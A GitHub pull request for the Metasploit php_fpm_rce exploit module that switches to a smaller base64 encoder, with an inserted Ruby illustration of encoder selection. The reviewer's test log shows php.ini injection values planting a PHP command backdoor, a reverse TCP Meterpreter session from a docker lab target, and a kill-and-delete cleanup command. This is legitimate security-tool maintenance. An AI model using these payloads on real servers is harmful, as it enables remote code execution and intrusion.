Use the smaller base64 encoder#20346

Merged
msutovsky-r7 merged 1 commit into rapid7:master from zeroSteiner:fix/issue/20310
Jun 27, 2025

Conversation

@zeroSteiner (Contributor)

This fixes the php_fpm_rce module which stopped working against the docker target from the original PR (#12863) when #19420 was landed. #19420 added a new encoder that increases the size of the payload more than the older base64 one. Now the php_fpm_rce module can't exactly have a space requirement because it depends on the target, so in this case it makes more sense to just prefer the older encoder that yields smaller payloads.

Fixes #20310, supersedes #20311.

Testing
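The reasoning behind this fix is a size budget: the module only has as much room for its payload as the target leaves it, so it should prefer whichever encoder produces the smallest output that still fits. The following Ruby is an added illustration of that selection logic, not code from this PR or from Metasploit. It uses the real standard base64 encoding as one candidate and a constructed, hypothetical "verbose" encoder (four characters per input byte) purely as a stand-in for an encoder with higher overhead; the sample payload string and budgets are constructed as well.

```ruby
require 'base64'

# Exact output length of standard (padded) base64 for n input bytes:
# every 3 input bytes become 4 output characters, last group padded.
def base64_len(n)
  4 * ((n + 2) / 3)
end

# Candidate encoders: name => lambda(raw bytes) -> encoded string.
# 'base64' is the real standard encoding; 'verbose' is a constructed
# stand-in for a hypothetical higher-overhead encoder (4 chars per byte),
# used only to show the selection logic.
ENCODERS = {
  'base64'  => ->(raw) { Base64.strict_encode64(raw) },
  'verbose' => ->(raw) { raw.bytes.map { |b| format('\\x%02x', b) }.join },
}.freeze

# Encode raw with every candidate, drop the ones that overflow the byte
# budget, and return [name, encoded] for the smallest survivor.
# Returns nil when no candidate fits, which is the failure mode this PR hit.
def pick_smallest_fitting(raw, budget, encoders = ENCODERS)
  fitting = encoders.map { |name, enc| [name, enc.call(raw)] }
                    .select { |_, out| out.bytesize <= budget }
  fitting.min_by { |_, out| out.bytesize }
end

# Expansion ratio of one encoder on a given input (output bytes / input bytes).
def expansion(name, raw, encoders = ENCODERS)
  encoders.fetch(name).call(raw).bytesize.to_f / raw.bytesize
end

if __FILE__ == $PROGRAM_NAME
  sample = '<?php echo 1; ?>' # constructed 16-byte sample, not a real payload
  [20, 30, 70].each do |budget|
    choice = pick_smallest_fitting(sample, budget)
    puts "budget #{budget}: #{choice ? choice[0] : 'nothing fits'}"
  end
end
```

The `nil` return is the important case: a larger encoder does not fail loudly, it simply leaves nothing that fits the target's budget, which is exactly why the module stopped working when the bigger encoder became the default.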

@msutovsky-r7 (Contributor) left a comment

msf6 exploit(multi/http/php_fpm_rce) > run verbose=true
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Sending baseline query...
[*] Base status code is 200
[*] Detecting QSL...
[*] Status code 502 for qsl=1765, adding as a candidate
[+] The target is probably vulnerable. Possible QSLs: [1765]
[*] Extended QSL list: [1755, 1760, 1765]
[*] Doing sanity check...
[*] Detecting attack parameters...
[*] send_params_detection: try #1
[*] Iterating until the PHP option is enabled (session.auto_start=1)...
[*] Attack params found, disabling PHP option (session.auto_start=0)...
[+] Parameters found: QSL=1760, customh_length=13
[+] Target is vulnerable!
[*] Performing attack using php.ini settings...
[*] send_attack_chain: try #1
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #2
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #3
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #4
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #5
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #6
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[+] Success! Was able to execute a command by appending 'which which'
[*] Trying to cleanup /tmp/j...
[*] send_backdoor_cleanup: try #1
[*] send_backdoor_cleanup: try #2
[*] send_backdoor_cleanup: try #3
[*] send_backdoor_cleanup: try #4
[*] send_backdoor_cleanup: try #5
[+] Cleanup done!
[*] Sending payload...
[*] send_payload: try #1
[*] send_payload: try #2
[*] send_payload: try #3
[*] send_payload: try #4
[*] send_payload: try #5
[*] Sending stage (40004 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51298) at 2025-06-27 17:00:28 +0200

[*] Remove /tmp/j and kill workers...
[*] send_cleanup: try #1
[*] send_cleanup: try #2
[*] send_cleanup: try #3
[*] send_cleanup: try #4
[*] send_cleanup: try #5
[*] send_cleanup: try #6
[*] send_cleanup: try #7
[*] send_cleanup: try #8
[*] send_cleanup: try #9
[*] send_cleanup: try #10
[*] send_cleanup: try #11
[*] send_cleanup: try #12
[*] send_cleanup: try #13
[*] send_cleanup: try #14
[*] send_cleanup: try #15
[*] send_cleanup: try #16
[*] send_cleanup: try #17
[*] send_cleanup: try #18
[*] send_cleanup: try #19
[*] send_cleanup: try #20
[-] Could not cleanup. Run these commands before terminating the session: for p in `pidof php-fpm`; do kill -9 $p;done; rm -f /tmp/j

meterpreter > 
meterpreter > sysinfo 
Computer    : 2dff8bb05736
OS          : Linux 2dff8bb05736 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Jun 27, 2025
@msutovsky-r7 msutovsky-r7 merged commit 126bff1 into rapid7:master Jun 27, 2025
19 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Jun 27, 2025
@msutovsky-r7 (Contributor)

msutovsky-r7 commented Jun 27, 2025

Release Notes

This fixes an issue with the php_fpm_rce module, which stopped working after adding a new encoder that increased the size of the payload. This addresses the issue and substitutes the original encoder for the smaller base64 encoder.

@adfoster-r7 (Contributor)

Patched up some of the english in the release notes here 📝

Labels: bug easy rn-fix release notes fix

Successfully merging this pull request may close these issues: PHP FPM RCE Exploit no longer functional due to new PHP encoders

4 participants